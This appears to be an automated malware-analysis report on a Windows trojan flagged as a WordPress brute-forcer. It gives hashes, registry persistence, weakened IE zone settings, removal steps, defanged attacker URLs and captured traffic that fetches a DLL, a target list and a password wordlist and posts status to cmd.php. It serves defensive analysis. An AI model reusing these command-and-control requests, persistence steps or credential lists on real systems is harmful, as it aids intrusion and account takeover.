Trojan.Win32.WPCracker.db (Kaspersky), Trojan.GenericKD.2177667 (B) (Emsisoft), Trojan.GenericKD.2177667 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 453ec0c6a71b8b714369862edb9cded4
SHA1: 6e9863ac6292f3d4f485ed70f2f2fe4ad80061f1
SHA256: 9549ca377130e51ad40357f58e4f7572b19626db4b46cbb17f3e6a6e0bfb455d
SSDeep: 6144:4Sto9WM19qd1z6ukdrCKppancW6QVhnCbU0rQpejH:4StqW8q1nMrCyW6ihnJ0r
Size: 282624 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2015-02-17 16:04:45
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1984
%original file name%.exe:696
%original file name%.exe:492
The Trojan injects its code into the following process(es):
%original file name%.exe:828
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\System\%original file name%.exe (1425 bytes)
The process %original file name%.exe:828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\System\libeay32.dll (7386 bytes)
%Documents and Settings%\All Users\Application Data\System\ssleay32.dll (270 bytes)
Registry activity
The process %original file name%.exe:1984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 79 4E 42 BF E8 48 E4 4D 7F 6F 14 10 DB 11 65"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\System]
"%original file name%.exe" = "453ec0c6a71b8b714369862edb9cded4"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"453ec0c6a71b8b714369862edb9cded4" = "%Documents and Settings%\All Users\Application Data\System\%original file name%.exe"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process %original file name%.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 F6 52 52 5F 7F 5B D6 04 4B 4E 2C DE 22 DE B0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
Dropped PE files
MD5 | File path |
---|---|
7a94e62ad54c62ecad385fddafe04304 | c:\Documents and Settings\All Users\Application Data\System\libeay32.dll |
e0cd0800a00d51025968d778d0e6b2b3 | c:\Documents and Settings\All Users\Application Data\System\ssleay32.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1984
%original file name%.exe:696
%original file name%.exe:492
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\All Users\Application Data\System\%original file name%.exe (1425 bytes)
%Documents and Settings%\All Users\Application Data\System\libeay32.dll (7386 bytes)
%Documents and Settings%\All Users\Application Data\System\ssleay32.dll (270 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"453ec0c6a71b8b714369862edb9cded4" = "%Documents and Settings%\All Users\Application Data\System\%original file name%.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 10210 | 12288 | 1.50698 | bbb79a13385e4227f55ecb162cf098ad |
.rdata | 16384 | 874 | 4096 | 0.942361 | 5100832a0812ee7823886a52bd9f9f5e |
.data | 20480 | 262144 | 262144 | 4.88166 | 11e88bae124b9c1f246e4ae06b627088 |
Network Activity
URLs
URL | IP |
---|---|
hxxp://178.63.29.34/ssl/ssleay32.dll | |
hxxp://178.63.29.34/temp_brut/42883.txt | |
hxxp://178.63.29.34/login.txt | |
hxxp://178.63.29.34/cmd.php | |
hxxp://maydayflower.od.ua/login.txt | |
hxxp://maydayflower.od.ua/temp_brut/42883.txt | |
hxxp://maydayflower.od.ua/ssl/ssleay32.dll | |
hxxp://maydayflower.od.ua/cmd.php | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /temp_brut/42883.txt HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:42 GMT
Content-Type: text/plain
Content-Length: 118726
Connection: keep-alive
Last-Modified: Sun, 01 Mar 2015 16:41:38 GMT
ETag: "4e6025d-1cfc6-5103cc681ce4d"
Accept-Ranges: bytes
Vary: Accept-Encoding
GET /ssl/ssleay32.dll HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:40 GMT
Content-Type: application/x-msdos-program
Content-Length: 270336
Connection: keep-alive
Last-Modified: Tue, 16 Dec 2014 03:45:50 GMT
ETag: "4e6007b-42000-50a4d31ee1780"
Accept-Ranges: bytes
GET /login.txt HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:43 GMT
Content-Type: text/plain
Content-Length: 134
Connection: keep-alive
Last-Modified: Fri, 06 Feb 2015 12:23:54 GMT
ETag: "4e40faf-86-50e6a7e787c9d"
Accept-Ranges: bytes
Vary: Accept-Encoding
info@{domaincut}.{zone}..test@{domaincut}.{zone}..admin@{domaincut}.{zone}..{domaincut}@{domaincut}.{zone}..123cad..admin..auditicia....
POST /cmd.php HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
status=1
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:43 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14 deb7u12
Vary: Accept-Encoding
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_828:
%original file name%.exe_828_rwx_00400000_00049000: